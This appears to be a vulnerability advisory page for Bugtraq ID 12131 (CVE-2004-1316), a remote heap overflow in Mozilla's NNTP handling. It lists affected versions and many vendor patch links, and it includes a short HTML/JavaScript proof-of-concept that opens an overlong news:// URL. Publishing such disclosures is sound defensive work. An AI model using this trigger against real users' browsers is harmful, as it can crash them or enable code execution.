Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
BID:12131
Info
Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
| Bugtraq ID: | 12131 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2004-1316 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 29 2004 12:00AM |
| Updated: | Jan 25 2007 04:21PM |
| Credit: | Disclosure of this issue is credited to Maurycy Prodeus. |
| Vulnerable: |
SuSE Linux 8.1 SuSE Linux 8.0 i386 SuSE Linux 8.0 SGI ProPack 3.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Professional 9.2 x86_64 S.u.S.E. Linux Professional 9.2 S.u.S.E. Linux Professional 9.1 x86_64 S.u.S.E. Linux Professional 9.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 9.3 x86_64 S.u.S.E. Linux Personal 9.3 S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 Redhat Linux 9.0 i386 Redhat Linux 7.3 i686 Redhat Linux 7.3 i386 Redhat Linux 7.3 Redhat Fedora Core2 Redhat Fedora Core1 Mozilla Thunderbird 0.8 Mozilla Thunderbird 0.7.3 Mozilla Thunderbird 0.7.2 Mozilla Thunderbird 0.7.1 Mozilla Thunderbird 0.7 Mozilla Thunderbird 0.6 Mozilla Browser 1.7.3 Mozilla Browser 1.7.2 Mozilla Browser 1.7.1 Mozilla Browser 1.7 rc3 Mozilla Browser 1.7 rc2 Mozilla Browser 1.7 rc1 Mozilla Browser 1.7 Mozilla Browser 1.6 Mozilla Browser 1.5.1 Mozilla Browser 1.5 Mozilla Browser 1.4.2 Mozilla Browser 1.4.1 Mozilla Browser 1.4 b Mozilla Browser 1.4 a Mozilla Browser 1.4 Mozilla Browser 1.3.1 Mozilla Browser 1.3 Mozilla Browser 1.2.1 Mozilla Browser 1.2 Mozilla Browser 1.1 Mozilla Browser 1.0.2 Mozilla Browser 1.0.1 Mozilla Browser 1.0 HP HP-UX B.11.23 HP HP-UX B.11.22 HP HP-UX B.11.11 HP HP-UX B.11.00 |
| Not Vulnerable: |
Mozilla Browser 1.7.5 Mozilla Browser 1.7.4 |
Discussion
Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
A remote heap-overflow vulnerability affects Mozilla Browser's network news transport protocol (NNTP) functionality. This issue is due to the application's failure to properly validate the length of user-supplied strings before copying them into dynamically allocated process buffers.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
A remote heap-overflow vulnerability affects Mozilla Browser's network news transport protocol (NNTP) functionality. This issue is due to the application's failure to properly validate the length of user-supplied strings before copying them into dynamically allocated process buffers.
An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.
Exploit / POC
Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
The following proof-of-concept script has been made available:
<html>
<script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>
The following proof-of-concept script has been made available:
<html>
<script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>
Solution / Fix
Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
Solution:
The vendor has released an upgrade dealing with this issue.
Please see the referenced advisories for further information.
Mozilla Thunderbird 0.8
Mozilla Browser 1.0
Mozilla Browser 1.0.1
Mozilla Browser 1.0.2
Mozilla Browser 1.1
Mozilla Browser 1.2
Mozilla Browser 1.2.1
Mozilla Browser 1.3
Mozilla Browser 1.3.1
Mozilla Browser 1.4 b
Mozilla Browser 1.4
Mozilla Browser 1.4 a
Mozilla Browser 1.4.1
Mozilla Browser 1.4.2
Mozilla Browser 1.5
Mozilla Browser 1.5.1
Mozilla Browser 1.6
Mozilla Browser 1.7 rc1
Mozilla Browser 1.7
Mozilla Browser 1.7 rc2
Mozilla Browser 1.7 rc3
Mozilla Browser 1.7.1
Mozilla Browser 1.7.2
Mozilla Browser 1.7.3
S.u.S.E. Linux Professional 10.0
SGI ProPack 3.0
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.3
Solution:
The vendor has released an upgrade dealing with this issue.
Please see the referenced advisories for further information.
Mozilla Thunderbird 0.8
-
SuSE MozillaThunderbird-0.8-5.5.i586.rpm
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/MozillaThunderbir d-0.8-5.5.i586.rpm -
SuSE MozillaThunderbird-0.8-5.5.x86_64.rpm
ftp://ftp.suse.com/pub/suse/x86_64/update/9.2/rpm/x86_64/MozillaThunde rbird-0.8-5.5.x86_64.rpm
Mozilla Browser 1.0
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.0.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.0.2
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.2
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.2.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/ -
Red Hat Fedora galeon-1.2.14-0.90.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/galeon-1.2.14-0 .90.2.legacy.i386.rpm -
Red Hat Fedora mozilla-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-1.7.7-0 .90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-chat-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-chat-1. 7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-devel-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-devel-1 .7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-dom-inspector-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-dom-ins pector-1.7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-js-debugger-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-js-debu gger-1.7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-mail-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-mail-1. 7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-1. 7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-devel-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nspr-de vel-1.7.7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-1.7 .7-0.90.1.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-devel-1.7.7-0.90.1.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/redhat/9/updates/i386/mozilla-nss-dev el-1.7.7-0.90.1.legacy.i386.rpm
Mozilla Browser 1.3
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.3.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.4 b
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.4
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.4 a
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.4.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/ -
Red Hat Fedora epiphany-1.0.8-1.fc1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/epiphany-1.0.8- 1.fc1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-1.7.7-1 .1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-chat-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-chat-1. 7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-devel-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-devel-1 .7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-dom-inspector-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-dom-ins pector-1.7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-js-debugger-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-js-debu gger-1.7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-mail-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-mail-1. 7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-1. 7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-devel-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nspr-de vel-1.7.7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-1.7 .7-1.1.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-devel-1.7.7-1.1.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/1/updates/i386/mozilla-nss-dev el-1.7.7-1.1.2.legacy.i386.rpm
Mozilla Browser 1.4.2
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.5
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.5.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.6
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/ -
Red Hat Fedora epiphany-1.2.10-0.2.3.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/epiphany-1.2.10 -0.2.3.legacy.i386.rpm -
Red Hat Fedora mozilla-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-1.7.7-1 .2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-chat-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-chat-1. 7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-devel-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-devel-1 .7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-dom-inspector-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-dom-ins pector-1.7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-js-debugger-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-js-debu gger-1.7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-mail-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-mail-1. 7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-nspr-1. 7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nspr-devel-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-nspr-de vel-1.7.7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-nss-1.7 .7-1.2.2.legacy.i386.rpm -
Red Hat Fedora mozilla-nss-devel-1.7.7-1.2.2.legacy.i386.rpm
Red Hat Fedora i386
http://download.fedoralegacy.org/fedora/2/updates/i386/mozilla-nss-dev el-1.7.7-1.2.2.legacy.i386.rpm
Mozilla Browser 1.7 rc1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7 rc2
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7 rc3
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7.1
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7.2
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
Mozilla Browser 1.7.3
-
Mozilla Mozilla 1.7.5
http://www.mozilla.org/releases/
S.u.S.E. Linux Professional 10.0
-
SuSE MozillaThunderbird-1.0.8-0.2.i586.rpm
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/MozillaThunderbi rd-1.0.8-0.2.i586.rpm -
SuSE MozillaThunderbird-1.0.8-0.2.x86_64.rpm
SUSE LINUX 10.0:
ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/x86_64/MozillaThunder bird-1.0.8-0.2.x86_64.rpm
SGI ProPack 3.0
-
SGI patch10137.tar.gz
ftp://patches.sgi.com/support/free/security/patches/ProPack/3/patch101 37.tar.gz
S.u.S.E. Linux Professional 9.1
-
SuSE MozillaThunderbird-1.0.8-0.1.i586.rpm
SUSE LINUX 9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/MozillaThunderbir d-1.0.8-0.1.i586.rpm -
SuSE MozillaThunderbird-1.0.8-0.1.x86_64.rpm
SUSE LINUX 9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/MozillaThunde rbird-1.0.8-0.1.x86_64.rpm
S.u.S.E. Linux Professional 9.2
-
SuSE MozillaThunderbird-1.0.8-0.2.i586.rpm
SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/MozillaThunderbir d-1.0.8-0.2.i586.rpm -
SuSE MozillaThunderbird-1.0.8-0.2.x86_64.rpm
SUSE LINUX 9.2:
ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/MozillaThunderb ird-1.0.8-0.2.x86_64.rpm
S.u.S.E. Linux Professional 9.3
-
SuSE MozillaThunderbird-1.0.8-0.2.i586.rpm
SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/MozillaThunderbir d-1.0.8-0.2.i586.rpm -
SuSE MozillaThunderbird-1.0.8-0.2.x86_64.rpm
SUSE LINUX 9.3:
ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/MozillaThunderb ird-1.0.8-0.2.x86_64.rpm
References
Mozilla Browser Network News Transport Protocol Remote Heap Overflow Vulnerability
References:
References: